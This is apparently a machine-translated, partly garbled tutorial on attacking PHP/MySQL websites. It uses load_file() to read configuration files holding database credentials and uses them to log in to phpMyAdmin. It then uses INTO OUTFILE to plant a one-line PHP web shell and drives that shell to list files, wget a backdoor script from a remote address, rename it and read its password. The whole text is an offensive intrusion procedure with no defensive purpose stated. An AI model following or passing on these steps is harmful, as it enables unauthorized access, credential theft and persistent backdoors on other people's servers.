load_file function and into_out function under PHP mysql

1.MySQL User's permissions (mysql.user can be viewed),File_priv, can read and write system files, Of course, this file if the current system users have read and write permissions.

2.load_file () function to read the contents of a file

3.Into outfile ( export character type files, such as text files ) or into dumpfile ( can export binary, such as execute file ) You can export the contents of a database to a file

4. A word trojan,<?php system ($_request[cmd];)?> can execute the command

5. mouse over the site link, in the following status bar see php?id= General Instructions and database interaction

6 on display bit with user () can display the current user, database () Displays the current database name, version () database version (@ @version) @ @basedir ( Show Database installation path " @@ DataDir data path for database

7 If you use load_file on the display bit ( load physical path ( because MAGIC_QUOTES_GPC It is possible to bypass its restriction after opening the conversion to 16, so convert to hexadecimal ) There is no database information, then it contains the files generally have database connection information, and then use load_file () Load the included files )

8MySQL in addition to Enterprise Edition is not remote connection, generally have phpmyadmin, usually after the site URL plus phpmyadmin

9 Use load_file () to load the user name password in the containing file login phpmyadmin, Create a new database, table, field, and then execute the statement in the database SELECT * from the beach into outfile ' website absolute path / export file filename ( create your own )'

visit the absolute path / exported file name of the website . php? See if the export was successful

Access the absolute path/ exported file name of the Web site . php? The Created field =ls list all files under the path

use wget This software to download the script backdoor: absolute path / exported filename of the website . php? The Created field =wget+ Download the address

After the download is complete, use the absolute path / exported file name of the website . php? The Created field =ls lists all files under the path to see if the download was successful.

Use the absolute path / exported filename of the website . php? The Created field =mv+ Original file name + New file name

visit the absolute path of the website / new file name login script Backdoor ( The absolute path / exported file name of the available Web site) . php? The Created field =cat./ newly created file name view script Backdoor password )

load_file function and into_out function under PHP mysql